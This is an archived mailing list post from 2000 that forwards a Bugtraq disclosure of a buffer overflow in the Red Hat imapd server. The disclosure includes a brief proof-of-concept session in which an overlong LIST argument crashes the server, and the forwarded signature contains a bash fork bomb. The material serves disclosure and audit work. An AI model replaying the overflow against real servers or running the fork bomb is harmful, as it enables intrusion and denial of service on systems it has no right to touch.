LinuxSA Mailing list archives

  From: Richard Sharpe <sharpe@ns.aus.com>
  To  : LinuxSA@linuxsa.org.au
  Date: Mon, 17 Apr 2000 00:44:01 +0900

Buffer overflows in IMAPD in RH latest ...

>Date: Sun, 16 Apr 2000 14:19:43 +0200
>From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
>Subject: imapd4r1 v12.264
>Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
>Approved-by: aleph1@SECURITYFOCUS.COM
>To: BUGTRAQ@SECURITYFOCUS.COM
>X-To: BUGTRAQ@SECURITYFOCUS.COM
>Reply-to: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
>Delivered-to: bugtraq@lists.securityfocus.com
>Delivered-to: BUGTRAQ@SECURITYFOCUS.COM
>X-Hate: Where do you want to go to die?
>Original-recipient: rfc822;sharpe@NS.AUS.COM
>
>Newest RH:
>
>* OK nimue IMAP4rev1 v12.264 server ready
>1 login lcamtuf test
>1 OK LOGIN completed
>1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;] 
>Program received signal SIGSEGV, Segmentation fault.
>0x41414141 in ?? ()
>
>*sigh*
>
>Privledges seems to be dropped, but, anyway, it's nice way to get shell
>access to mail account, maybe grab some data from memory etc. I believe
>both imap and ipopd packages need code security audit.
>
>_______________________________________________________
>Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
>[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
>=-----=> God is real, unless declared integer. <=-----=
>
>
>
>
>===========================================================================
>List przyszedł z listy <secure@mud.pl>
>

Regards
-------
Richard Sharpe, sharpe@ns.aus.com, Master Linux Administrator :-),
Samba (Team member, www.samba.org), Ethereal (Team member, www.zing.org)
Co-author, SAMS Teach Yourself Samba in 24 Hours
Author: First Australian 5-day, intensive, hands-on Linux SysAdmin course
Author: First Australian 2-day, intensive, hands-on Samba course

-- 
LinuxSA WWW: http://www.linuxsa.org.au/  IRC: #linuxsa on irc.linux.org.au
To unsubscribe from the LinuxSA list:
  mail linuxsa-request@linuxsa.org.au with "unsubscribe" as the subject